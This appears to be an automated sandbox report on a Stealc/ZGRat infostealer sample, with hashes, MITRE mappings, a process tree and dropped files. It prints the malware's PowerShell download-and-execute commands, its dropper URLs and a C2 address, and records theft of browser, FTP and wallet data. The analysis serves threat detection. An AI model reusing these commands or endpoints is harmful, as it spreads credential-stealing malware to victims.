stealc | 56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d

Analysis

max time kernel
296s
max time network
244s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
09-05-2024 22:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Size

49KB
MD5

d58a180c5d85448472b4e1007fae4b2a
SHA1

c07bf8ee2bb73efbf111c2dd753d70bbd84cdb54
SHA256

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d
SHA512

78002ed8c7342d2298f74090afe83572f8373c8e34a3ea9bbc2fc8fed04b2cb3511cb1fd0dd194b1ac41ac0a77ab1cdaa184d34e25cf1b21e4f8990922be3367
SSDEEP

1536:XferrLkSRoe8C4UZsys0Dh1duFpkvFI+Plh:Xfi3k+oWDBDh1duFpjWlh

Score

10^/10

stealc zgrat discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/memory/708-192-0x00000200BCB30000-0x00000200C0364000-memory.dmp	family_zgrat_v1
behavioral2/memory/708-193-0x00000200DAB10000-0x00000200DAC1A000-memory.dmp	family_zgrat_v1
behavioral2/memory/708-197-0x00000200C21E0000-0x00000200C2204000-memory.dmp	family_zgrat_v1

Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 5 IoCs

flow	pid	Process
20	204	powershell.exe
22	3032	powershell.exe
23	3032	powershell.exe
25	4500	powershell.exe
27	4500	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1840	i1.exe
4748	u1f4.0.exe
4780	u1f4.1.exe

Loads dropped DLL 3 IoCs

pid	Process
2520	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
4748	u1f4.0.exe
4748	u1f4.0.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
204	powershell.exe
3032	powershell.exe
4500	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1f4.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1f4.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1f4.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1f4.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1f4.0.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
204	powershell.exe
204	powershell.exe
204	powershell.exe
3032	powershell.exe
3032	powershell.exe
3032	powershell.exe
4500	powershell.exe
4500	powershell.exe
4500	powershell.exe
4748	u1f4.0.exe
4748	u1f4.0.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	204	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 5100	2520	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	73
PID 2520 wrote to memory of 5100	2520	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	73
PID 2520 wrote to memory of 5100	2520	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	73
PID 5100 wrote to memory of 204	5100	cmd.exe	75
PID 5100 wrote to memory of 204	5100	cmd.exe	75
PID 5100 wrote to memory of 204	5100	cmd.exe	75
PID 5100 wrote to memory of 3032	5100	cmd.exe	76
PID 5100 wrote to memory of 3032	5100	cmd.exe	76
PID 5100 wrote to memory of 3032	5100	cmd.exe	76
PID 5100 wrote to memory of 1840	5100	cmd.exe	77
PID 5100 wrote to memory of 1840	5100	cmd.exe	77
PID 5100 wrote to memory of 1840	5100	cmd.exe	77
PID 5100 wrote to memory of 4500	5100	cmd.exe	78
PID 5100 wrote to memory of 4500	5100	cmd.exe	78
PID 5100 wrote to memory of 4500	5100	cmd.exe	78
PID 1840 wrote to memory of 4748	1840	i1.exe	79
PID 1840 wrote to memory of 4748	1840	i1.exe	79
PID 1840 wrote to memory of 4748	1840	i1.exe	79
PID 1840 wrote to memory of 4780	1840	i1.exe	81
PID 1840 wrote to memory of 4780	1840	i1.exe	81
PID 1840 wrote to memory of 4780	1840	i1.exe	81
PID 4780 wrote to memory of 708	4780	u1f4.1.exe	83
PID 4780 wrote to memory of 708	4780	u1f4.1.exe	83

C:\Users\Admin\AppData\Local\Temp\56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
"C:\Users\Admin\AppData\Local\Temp\56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsd5B9E.tmp\app.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:204
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3032
- - C:\Users\Admin\AppData\Local\Temp\i1.exe
    i1.exe /SUB=2838 /str=one
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4748
  - - C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4780
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:708
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
66382a4ca6c4dcf75ce41417d44be93e

SHA1
8132cbef1c12f8a89a68a6153ade4286bf130812

SHA256
a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

SHA512
2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
bd07a04ff703b68279e1de431753ec52

SHA1
07c067c097858aab61a993b4121ccbd284a57380

SHA256
a8a4865c68ba2135f6566511361a378549b734a7b481330c5b8c74fb100c492f

SHA512
ab36b392a08825ce6852c209bc7490ee7c7ef8d2a4c42fde0bf4c61856962626b8edce9b36e810752c5df2ffa7a9e7e2b0880ba25fc6c5f881b166c97b60eea0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
dc5d733037418043497b2c99124f132b

SHA1
5fe601c81ebc02660bd94d0c7c21f0daeea4e794

SHA256
757e1e1e4a6c6a62c3a71de6a32ba6023d3955b705ac11e0e7aec6e776ebc3a6

SHA512
0691ee1f24cee85afc59859c2c7b38cfbb8e3fb86afe26100ae6ed66d6128e858ad07a22763046e66dcbfb8b4cf50020c00500a2950185a743f2d9bf3b88bfab

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wiipjhxh.ndl.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\i1.exe

Filesize
384KB

MD5
0f39626443b9a5ecbdac24c96e12728a

SHA1
04c402e550534f0871471f5b80fc5723f283f25c

SHA256
fab860ca07692e3f3f2c438a9faf142288fdbcbb43edf24e8b3b88683a529477

SHA512
9b74eea35b9ed7ea5e286ec29a676407f72a63c3d90c22616d73d0626a0cf656d9e1aaafd8c07021c38c8bf9cc75cd1a6b6ca4f7198f07c8794aad1d4bf618e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
31ac12b5051f61d39a941b58d49d3e4c

SHA1
fb365272f12ef2f4dcbc77695a4ce3996929a27d

SHA256
fb309125d53f8d7caebb0d1c75fe4aeee34afbd4cbd934544e2bd64cd167a5f5

SHA512
2c2328d147d4bbddfcb36e868b6362d56312b4d35a0b0a74eced0b7797d88da3448152a52b0dc4df4ed38d48b625ce36d0e44faeeaa4846a37c9d12a1b8f865b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsd5B9E.tmp\app.bat

Filesize
735B

MD5
f32d05160acf8325e9a09f09f80d16f4

SHA1
46e159b71e6ef99076c4002e1fda134e1d0a86c9

SHA256
da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37

SHA512
147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe

Filesize
206KB

MD5
0917be53327ea132956255dcab650a82

SHA1
b60818917f645a8a9af3b530e3ae37c1f002be2f

SHA256
211c34660898480e0777c6ef6f61bf2111f6550e00b40cab859543d567dc455a

SHA512
a72acc24ba813d983bbf2ecab7929d0aab4e25637ae43e85b973a5105429bd15c061415fd855737620caaf81b456b2d6ba57f85566245efbe5f8b5db5560932a

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\Users\Admin\AppData\Local\Temp\nsd5B9E.tmp\INetC.dll

Filesize
25KB

MD5
40d7eca32b2f4d29db98715dd45bfac5

SHA1
124df3f617f562e46095776454e1c0c7bb791cc7

SHA256
85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

SHA512
5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Download Submit
memory/204-26-0x0000000007A00000-0x0000000007A66000-memory.dmp

Filesize
408KB

Download
memory/204-28-0x0000000007A90000-0x0000000007AAC000-memory.dmp

Filesize
112KB

Download
memory/204-45-0x0000000009AA0000-0x000000000A118000-memory.dmp

Filesize
6.5MB

Download
memory/204-47-0x0000000072210000-0x00000000728FE000-memory.dmp

Filesize
6.9MB

Download
memory/204-51-0x0000000072210000-0x00000000728FE000-memory.dmp

Filesize
6.9MB

Download
memory/204-30-0x00000000082D0000-0x0000000008346000-memory.dmp

Filesize
472KB

Download
memory/204-29-0x00000000085D0000-0x000000000861B000-memory.dmp

Filesize
300KB

Download
memory/204-46-0x0000000009140000-0x000000000915A000-memory.dmp

Filesize
104KB

Download
memory/204-27-0x0000000007C50000-0x0000000007FA0000-memory.dmp

Filesize
3.3MB

Download
memory/204-25-0x00000000072D0000-0x0000000007336000-memory.dmp

Filesize
408KB

Download
memory/204-24-0x0000000007150000-0x0000000007172000-memory.dmp

Filesize
136KB

Download
memory/204-23-0x00000000073D0000-0x00000000079F8000-memory.dmp

Filesize
6.2MB

Download
memory/204-22-0x0000000072210000-0x00000000728FE000-memory.dmp

Filesize
6.9MB

Download
memory/204-21-0x0000000004B30000-0x0000000004B66000-memory.dmp

Filesize
216KB

Download
memory/204-18-0x000000007221E000-0x000000007221F000-memory.dmp

Filesize
4KB

Download
memory/708-210-0x00000200E04D0000-0x00000200E0508000-memory.dmp

Filesize
224KB

Download
memory/708-201-0x00000200DAFA0000-0x00000200DAFF0000-memory.dmp

Filesize
320KB

Download
memory/708-224-0x00000200DB660000-0x00000200DB7E9000-memory.dmp

Filesize
1.5MB

Download
memory/708-221-0x00000200E0890000-0x00000200E08AE000-memory.dmp

Filesize
120KB

Download
memory/708-220-0x00000200E0930000-0x00000200E09A6000-memory.dmp

Filesize
472KB

Download
memory/708-219-0x00000200E07E0000-0x00000200E07EC000-memory.dmp

Filesize
48KB

Download
memory/708-216-0x00000200E0DA0000-0x00000200E12C6000-memory.dmp

Filesize
5.1MB

Download
memory/708-192-0x00000200BCB30000-0x00000200C0364000-memory.dmp

Filesize
56.2MB

Download
memory/708-195-0x00000200C20E0000-0x00000200C20EC000-memory.dmp

Filesize
48KB

Download
memory/708-194-0x00000200C2050000-0x00000200C2060000-memory.dmp

Filesize
64KB

Download
memory/708-193-0x00000200DAB10000-0x00000200DAC1A000-memory.dmp

Filesize
1.0MB

Download
memory/708-196-0x00000200C20D0000-0x00000200C20E4000-memory.dmp

Filesize
80KB

Download
memory/708-197-0x00000200C21E0000-0x00000200C2204000-memory.dmp

Filesize
144KB

Download
memory/708-199-0x00000200C2210000-0x00000200C223A000-memory.dmp

Filesize
168KB

Download
memory/708-198-0x00000200C20A0000-0x00000200C20AA000-memory.dmp

Filesize
40KB

Download
memory/708-200-0x00000200DAEA0000-0x00000200DAF52000-memory.dmp

Filesize
712KB

Download
memory/708-202-0x00000200DAFF0000-0x00000200DB012000-memory.dmp

Filesize
136KB

Download
memory/708-213-0x00000200E07D0000-0x00000200E07DA000-memory.dmp

Filesize
40KB

Download
memory/708-203-0x00000200C20B0000-0x00000200C20BA000-memory.dmp

Filesize
40KB

Download
memory/708-207-0x00000200DB360000-0x00000200DB660000-memory.dmp

Filesize
3.0MB

Download
memory/708-214-0x00000200E07F0000-0x00000200E0852000-memory.dmp

Filesize
392KB

Download
memory/708-209-0x00000200DF640000-0x00000200DF648000-memory.dmp

Filesize
32KB

Download
memory/708-211-0x00000200DF6A0000-0x00000200DF6A8000-memory.dmp

Filesize
32KB

Download
memory/708-215-0x00000200E0850000-0x00000200E0872000-memory.dmp

Filesize
136KB

Download
memory/1840-115-0x0000000000400000-0x0000000002B1E000-memory.dmp

Filesize
39.1MB

Download
memory/1840-145-0x0000000000400000-0x0000000002B1E000-memory.dmp

Filesize
39.1MB

Download
memory/3032-55-0x0000000006D50000-0x00000000070A0000-memory.dmp

Filesize
3.3MB

Download
memory/4500-82-0x0000000007D10000-0x0000000007D5B000-memory.dmp

Filesize
300KB

Download
memory/4500-80-0x0000000007680000-0x00000000079D0000-memory.dmp

Filesize
3.3MB

Download
memory/4748-118-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/4748-212-0x0000000000400000-0x0000000002AF1000-memory.dmp

Filesize
38.9MB

Download
memory/4748-117-0x0000000000400000-0x0000000002AF1000-memory.dmp

Filesize
38.9MB

Download
memory/4748-157-0x0000000000400000-0x0000000002AF1000-memory.dmp

Filesize
38.9MB

Download
memory/4748-253-0x0000000000400000-0x0000000002AF1000-memory.dmp

Filesize
38.9MB

Download
memory/4780-191-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/4780-181-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download